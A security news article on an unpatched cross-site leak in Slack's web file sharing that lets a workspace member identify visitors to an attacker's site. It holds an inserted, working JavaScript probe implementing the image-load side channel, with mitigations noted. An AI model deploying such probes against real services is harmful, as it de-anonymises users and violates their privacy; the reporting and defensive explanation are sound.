XSLeak flaw in Slack could allow a malicious workspace member to launch de-anonymisation attacks

Slack says users can prevent such attacks by ensuring that everyone in their workspace is 'trusted'

A security researcher claims to have uncovered a cross-site leak (XSLeak) flaw in the file-sharing feature of Slack's web application that could let a malicious workspace member identify fellow members outside of the workforce messaging platform, whenever those users visit the attacker's website in a Chromium-based browser.

Julien Cretel, who found the vulnerability, said in a blog post that the popular collaboration platform has no plans to patch the security hole, saying users can prevent such attacks by ensuring that everyone in their workspace is 'trusted'.

XSLeaks are a class of security vulnerabilities that arise from side channels built into the web platform itself. They exploit the web's core principle of composability, which lets websites interact with one another, by abusing legitimate cross-site mechanisms (loading another site's image, for instance) to infer sensitive information about the visiting user.

In a paper published in 2019, researchers from TU Darmstadt detailed an XSLeak channel in image-sharing features of some popular messaging platforms, including Facebook, Twitter, Google, and Microsoft Live.

They explained that when a user uploads an image in a private chat thread, the hosting service generates a unique URL for that resource that is accessible only to the parties in that thread. A malicious actor can abuse this mechanism: share an image with a target user to obtain a URL that only the target can load, then have the browsers of visitors to another website request that same URL. Because the browser attaches the visitor's cookies to the request, the image loads only if the visitor is the target, and the attacker's page can tell the two outcomes apart from the browser's response.

This technique can be used for fingerprinting or spear phishing attacks, they warned.

Cretel told The Daily Swig that when he checked the file-sharing functionality of Slack's web client, he found that it was vulnerable to "Leaky Image" attacks. But in order to exploit the security flaw, the attacker must have a user account in the same Slack workspace as their targets and be able to send them direct messages, he added.

Cretel said he had also created a novel technique that extended the attack from a single target to multiple Slack users.
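To make the "Leaky Images" mechanism described above concrete, and to show how it extends to several candidate users, here is an added example written for this page; it is not code from the article, from Cretel's post, or from the Leaky Images paper. It assumes (these are assumptions, not facts from the article) that shared-file URLs have the form `https://files.slack.example/<fileId>/image.png`, that the sharing service returns the image only when the request carries the session cookie of a user who is a party to the direct message in which the file was shared, and that the attacker has shared one distinct image with each candidate user. The candidate map and the simulated access check are constructed for the example.

```javascript
// Added example of a Leaky Images / XSLeak probe (not the article's own code).
//
// Assumption: each URL below was shared with exactly one user via a direct
// message, so the service serves it only to that user's session. The file IDs
// and hostname are made up for this example.
const CANDIDATE_IMAGES = {
  "https://files.slack.example/F01AAA/image.png": "alice",
  "https://files.slack.example/F01BBB/image.png": "bob",
  "https://files.slack.example/F01CCC/image.png": "carol",
};

// Browser-side loader. An <img> request is a cross-site, no-CORS fetch that
// Chromium (with third-party cookies allowed) sends with the visitor's cookies,
// so the load/error outcome reflects the service's access decision about the
// *visitor*, not about the attacker. That is the side channel.
function loadImageInBrowser(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);   // decoded OK: visitor is a party to that DM
    img.onerror = () => resolve(false); // error status or non-image body: not a party
    img.src = url;
  });
}

// Pure decision logic, separated from the browser so it can be checked offline.
// One-image-per-user means at most one probe can succeed for a given visitor.
function classify(candidateImages, urls, loaded) {
  const hits = urls.filter((_, i) => loaded[i]).map((u) => candidateImages[u]);
  if (hits.length === 0) return null; // not a candidate, or not logged in: indistinguishable
  if (hits.length > 1) throw new Error("ambiguous: images were not shared one-per-user");
  return hits[0];
}

// Probe every candidate URL in parallel and map the result back to a user.
// `loadImage` is injectable so the attack logic can be simulated without a DOM.
async function identifyVisitor(candidateImages, loadImage = loadImageInBrowser) {
  const urls = Object.keys(candidateImages);
  const loaded = await Promise.all(urls.map(loadImage));
  return classify(candidateImages, urls, loaded);
}

// Offline stand-in for the sharing service's access check: the visitor's
// session belongs to `sessionUser` (null means logged out). This simulates the
// assumed server behaviour; it is not Slack's implementation.
function simulatedLoader(sessionUser) {
  return (url) => Promise.resolve(CANDIDATE_IMAGES[url] === sessionUser);
}

// Stand-alone demonstration of the simulated attack.
identifyVisitor(CANDIDATE_IMAGES, simulatedLoader("bob")).then((who) => {
  console.log("visitor identified as:", who); // bob
});
```

Two practical notes. First, a `null` result tells the attacker nothing: a logged-out visitor and a non-candidate produce the same error event, so the attack only de-anonymises visitors who are in the candidate set and signed in. Second, the whole channel depends on the browser attaching the victim's cookies to a cross-site `<img>` request; the article notes the bug does not affect Safari or Firefox, whose third-party-cookie defaults deny that, and a service can also opt out by serving such files with `Cross-Origin-Resource-Policy: same-site`, which makes supporting browsers refuse the cross-origin no-CORS load before the page can observe the outcome.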

The bug does not affect the mobile and desktop apps or non-Chromium browsers such as Safari and Firefox, according to the security researcher.

When Cretel notified Slack about the flaw, the platform declined to fix it, saying that Slack is a trusted workspace and "there is at least some implied measure of trust, or at least familiarity, between two users in a Slack Workspace".

A spokesperson for Slack told The Daily Swig that the "best way to prevent attacks between members of a workspace is to ensure everyone in your workspace is a trusted member or partner".

The spokesperson added that the platform provides each organisation "control over permissions to send invitations and tools to restrict membership as appropriate".

This is not the first time a security weakness has been uncovered in Slack.

Last year, the platform patched a critical remote code execution (RCE) vulnerability in its desktop app that could have allowed a remote attacker to take control of the app and steal users' confidential information from the device.

Oskars Vegeris, the security researcher who found the RCE bug, warned that malicious actors could build an exploit for the flaw to gain full remote control over the Slack desktop app, and with it access to private conversations, channels, passwords, keys and tokens, and various functions within the app.

Vegeris also found that emails sent to Slack as plaintext are stored unfiltered on Slack's servers. He warned that attackers could abuse this to host the RCE payload on Slack itself, without needing hosting of their own.